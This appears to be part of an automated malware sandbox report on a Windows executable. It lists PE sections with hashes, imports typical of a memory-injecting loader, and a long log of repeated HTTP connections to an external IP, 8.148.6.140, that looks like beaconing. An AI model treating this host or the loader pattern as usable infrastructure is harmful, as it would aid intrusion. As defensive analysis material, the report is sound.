.pdata	0x51000	0x2b8	0x400	f88aef14dea168f37249daf0dce04c78	False	0.37890625	data	3.2311971178670404	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.xdata	0x52000	0x238	0x400	6ce9e303fb86766d702ecb2b174cf348	False	0.2578125	data	2.6337753778508075	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.bss	0x53000	0x9d0	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x54000	0x8d8	0xa00	3aae8d98b4d34bad008e73a14573bffd	False	0.323828125	data	3.966749721413537	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x55000	0x68	0x200	52d79e9aecf5d5c3145d3ec54aa197a8	False	0.0703125	data	0.2709192282599745	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x56000	0x10	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL

Import

KERNEL32.dll

CloseHandle, ConnectNamedPipe, CreateFileA, CreateNamedPipeA, CreateThread, DeleteCriticalSection, EnterCriticalSection, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetLastError, GetModuleHandleA, GetProcAddress, GetStartupInfoA, GetSystemTimeAsFileTime, GetTickCount, InitializeCriticalSection, LeaveCriticalSection, QueryPerformanceCounter, ReadFile, RtlAddFunctionTable, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetUnhandledExceptionFilter, Sleep, TerminateProcess, TlsGetValue, UnhandledExceptionFilter, VirtualAlloc, VirtualProtect, VirtualQuery, WriteFile

msvcrt.dll

__C_specific_handler, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _fmode, _initterm, _onexit, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, signal, sprintf, strlen, strncmp, vfprintf

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 09:24:57.367255926 CET	49709	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:24:57.372132063 CET	80	49709	8.148.6.140	192.168.2.6
Jan 10, 2025 09:24:57.372256994 CET	49709	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:24:57.372459888 CET	49709	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:24:57.377312899 CET	80	49709	8.148.6.140	192.168.2.6
Jan 10, 2025 09:24:58.357806921 CET	80	49709	8.148.6.140	192.168.2.6
Jan 10, 2025 09:24:58.357911110 CET	49709	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:24:58.357927084 CET	80	49709	8.148.6.140	192.168.2.6
Jan 10, 2025 09:24:58.357974052 CET	49709	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:24:58.358077049 CET	49709	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:24:58.362859964 CET	80	49709	8.148.6.140	192.168.2.6
Jan 10, 2025 09:24:58.477029085 CET	49710	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:24:58.481918097 CET	80	49710	8.148.6.140	192.168.2.6
Jan 10, 2025 09:24:58.482009888 CET	49710	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:24:58.482283115 CET	49710	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:24:58.487159967 CET	80	49710	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:00.032339096 CET	80	49710	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:00.032417059 CET	49710	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:00.032510996 CET	80	49710	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:00.032568932 CET	49710	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:00.032660007 CET	49710	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:00.038943052 CET	80	49710	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:00.149182081 CET	49711	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:00.155448914 CET	80	49711	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:00.155579090 CET	49711	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:00.155724049 CET	49711	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:00.161375046 CET	80	49711	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:04.134390116 CET	80	49711	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:04.134474993 CET	49711	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:04.134537935 CET	80	49711	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:04.134584904 CET	49711	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:04.134978056 CET	49711	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:04.139834881 CET	80	49711	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:04.242764950 CET	49714	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:04.247626066 CET	80	49714	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:04.247736931 CET	49714	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:04.248008966 CET	49714	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:04.252800941 CET	80	49714	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:05.225856066 CET	80	49714	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:05.225918055 CET	80	49714	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:05.225939035 CET	49714	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:05.226022005 CET	49714	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:05.226305008 CET	49714	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:05.231098890 CET	80	49714	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:05.336360931 CET	49721	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:05.341227055 CET	80	49721	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:05.341316938 CET	49721	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:05.341588974 CET	49721	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:05.346504927 CET	80	49721	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:06.302859068 CET	80	49721	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:06.302975893 CET	80	49721	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:06.303042889 CET	49721	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:06.303236961 CET	49721	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:06.303236961 CET	49721	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:06.308017015 CET	80	49721	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:06.414550066 CET	49731	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:06.419504881 CET	80	49731	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:06.419756889 CET	49731	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:06.419847012 CET	49731	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:06.424684048 CET	80	49731	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:07.390146971 CET	80	49731	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:07.390269041 CET	49731	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:07.390309095 CET	80	49731	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:07.390369892 CET	49731	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:07.390595913 CET	49731	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:07.395411968 CET	80	49731	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:07.493468046 CET	49737	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:07.498327017 CET	80	49737	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:07.498430967 CET	49737	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:07.498735905 CET	49737	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:07.503542900 CET	80	49737	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:11.480207920 CET	80	49737	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:11.480298042 CET	49737	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:11.480307102 CET	80	49737	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:11.480359077 CET	49737	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:11.480423927 CET	49737	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:11.485306025 CET	80	49737	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:11.586211920 CET	49765	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:11.591063976 CET	80	49765	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:11.591145992 CET	49765	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:11.591334105 CET	49765	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:11.596112967 CET	80	49765	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:12.575119972 CET	80	49765	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:12.575267076 CET	49765	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:12.575289011 CET	80	49765	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:12.575362921 CET	80	49765	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:12.575416088 CET	49765	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:12.575539112 CET	49765	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:12.580543041 CET	80	49765	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:12.680046082 CET	49778	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:12.684880018 CET	80	49778	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:12.684952974 CET	49778	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:12.685149908 CET	49778	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:12.689944029 CET	80	49778	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:13.646812916 CET	80	49778	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:13.646873951 CET	49778	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:13.646960974 CET	80	49778	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:13.646985054 CET	80	49778	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:13.647130966 CET	49778	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:13.647249937 CET	49778	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:13.652084112 CET	80	49778	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:13.758826971 CET	49786	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:13.763710976 CET	80	49786	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:13.763792038 CET	49786	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:13.763993025 CET	49786	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:13.768770933 CET	80	49786	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:14.756736994 CET	80	49786	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:14.756846905 CET	80	49786	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:14.756957054 CET	49786	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:14.782536030 CET	49786	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:14.787323952 CET	80	49786	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:14.987703085 CET	49796	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:14.992662907 CET	80	49796	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:14.992742062 CET	49796	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:14.995476007 CET	49796	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:15.000344992 CET	80	49796	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:15.938654900 CET	80	49796	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:15.938674927 CET	80	49796	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:15.938736916 CET	49796	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:15.938930035 CET	49796	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:15.943980932 CET	80	49796	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:16.054989100 CET	49803	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:16.059864998 CET	80	49803	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:16.059964895 CET	49803	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:16.060157061 CET	49803	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:16.064943075 CET	80	49803	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:20.026225090 CET	80	49803	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:20.026446104 CET	80	49803	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:20.026896954 CET	49803	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:20.030257940 CET	49803	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:20.035258055 CET	80	49803	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:20.134533882 CET	49829	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:20.139853001 CET	80	49829	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:20.140011072 CET	49829	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:20.140230894 CET	49829	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:20.145319939 CET	80	49829	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:24.148230076 CET	49829	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:24.258243084 CET	49852	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:24.263376951 CET	80	49852	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:24.263667107 CET	49852	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:24.263667107 CET	49852	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:24.269136906 CET	80	49852	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:28.246922016 CET	80	49852	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:28.247061968 CET	49852	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:28.247102022 CET	80	49852	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:28.247148037 CET	49852	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:28.247201920 CET	49852	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:28.252003908 CET	80	49852	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:28.367619991 CET	49876	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:28.372581959 CET	80	49876	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:28.372697115 CET	49876	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:28.376948118 CET	49876	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:28.381786108 CET	80	49876	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:29.349307060 CET	80	49876	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:29.349438906 CET	80	49876	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:29.349500895 CET	49876	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:29.349500895 CET	49876	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:29.349602938 CET	49876	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:29.354444981 CET	80	49876	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:29.461474895 CET	49885	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:29.466306925 CET	80	49885	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:29.466411114 CET	49885	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:29.466532946 CET	49885	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:29.471296072 CET	80	49885	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:30.456492901 CET	80	49885	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:30.456510067 CET	80	49885	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:30.456597090 CET	49885	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:30.456794024 CET	49885	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:30.461525917 CET	80	49885	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:30.573402882 CET	49891	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:30.578228951 CET	80	49891	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:30.578324080 CET	49891	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:30.580194950 CET	49891	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:30.584958076 CET	80	49891	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:34.585571051 CET	49891	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:34.696378946 CET	49918	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:34.701252937 CET	80	49918	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:34.701339006 CET	49918	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:34.707501888 CET	49918	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:34.712331057 CET	80	49918	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:35.672286987 CET	80	49918	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:35.672410011 CET	49918	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:35.672787905 CET	80	49918	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:35.672840118 CET	49918	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:35.672863007 CET	80	49918	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:35.673754930 CET	49918	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:35.791896105 CET	49918	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:35.792459011 CET	49927	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:35.796740055 CET	80	49918	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:35.797348022 CET	80	49927	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:35.797472954 CET	49927	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:35.797630072 CET	49927	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:35.802409887 CET	80	49927	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:39.808909893 CET	49927	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:39.961524963 CET	49951	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:39.966320038 CET	80	49951	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:39.966396093 CET	49951	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:39.966686964 CET	49951	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:39.972619057 CET	80	49951	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:40.969285011 CET	80	49951	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:40.969348907 CET	49951	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:40.969417095 CET	80	49951	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:40.969583988 CET	49951	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:41.085896969 CET	49951	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:41.086410999 CET	49961	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:41.090784073 CET	80	49951	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:41.091238976 CET	80	49961	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:41.091319084 CET	49961	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:41.091602087 CET	49961	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:41.096414089 CET	80	49961	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:42.065077066 CET	80	49961	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:42.065109015 CET	80	49961	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:42.065285921 CET	49961	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:42.065448999 CET	49961	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:42.070235014 CET	80	49961	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:42.180341005 CET	49968	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:42.185214043 CET	80	49968	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:42.185357094 CET	49968	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:42.185496092 CET	49968	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:42.190360069 CET	80	49968	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:44.532581091 CET	80	49968	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:44.532723904 CET	80	49968	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:44.532732964 CET	49968	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:44.532820940 CET	49968	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:44.532927990 CET	49968	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:44.537693024 CET	80	49968	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:44.649471998 CET	49983	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:44.654372931 CET	80	49983	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:44.654500961 CET	49983	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:44.654841900 CET	49983	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:44.659638882 CET	80	49983	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:45.650706053 CET	80	49983	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:45.650790930 CET	49983	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:45.650829077 CET	80	49983	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:45.650913954 CET	49983	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:45.651000023 CET	49983	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:45.655833006 CET	80	49983	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:45.758423090 CET	49993	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:45.763302088 CET	80	49993	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:45.763392925 CET	49993	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:45.763552904 CET	49993	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:45.768323898 CET	80	49993	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:46.759440899 CET	80	49993	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:46.759573936 CET	49993	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:46.759577036 CET	80	49993	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:46.759622097 CET	49993	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:46.759893894 CET	80	49993	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:46.759941101 CET	49993	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:46.867181063 CET	49993	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:46.867547035 CET	50000	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:46.872020960 CET	80	49993	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:46.872345924 CET	80	50000	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:46.872421980 CET	50000	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:46.872667074 CET	50000	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:46.877439976 CET	80	50000	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:51.018626928 CET	50000	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:51.133219957 CET	50009	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:51.138206005 CET	80	50009	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:51.138290882 CET	50009	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:51.138451099 CET	50009	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:51.143305063 CET	80	50009	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:52.697487116 CET	80	50009	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:52.697520018 CET	80	50009	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:52.697592974 CET	50009	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:52.697637081 CET	50009	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:52.697716951 CET	50009	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:52.703018904 CET	80	50009	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:52.804835081 CET	50010	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:52.809823036 CET	80	50010	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:52.809917927 CET	50010	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:52.810017109 CET	50010	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:52.814760923 CET	80	50010	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:53.808669090 CET	80	50010	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:53.808723927 CET	50010	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:53.808751106 CET	80	50010	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:53.808792114 CET	50010	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:53.809062004 CET	50010	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:53.813857079 CET	80	50010	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:53.917885065 CET	50011	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:25:53.922827005 CET	80	50011	8.148.6.140	192.168.2.6
Jan 10, 2025 09:25:53.922916889 CET	50011	80	192.168.2.6	8.148.6.140
